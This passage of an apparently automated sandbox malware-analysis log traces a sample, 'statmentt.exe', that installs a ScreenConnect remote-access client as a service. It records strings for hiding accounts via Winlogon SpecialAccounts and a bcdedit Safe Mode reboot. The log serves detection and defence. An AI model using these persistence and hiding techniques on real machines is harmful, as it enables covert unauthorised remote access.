                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF739.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF488.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF739.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000004.00000003.1797154534.0000000004388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888442965.0000000001550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888844830.00000000015D2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1899115632.000000001C062000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: statmentt.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
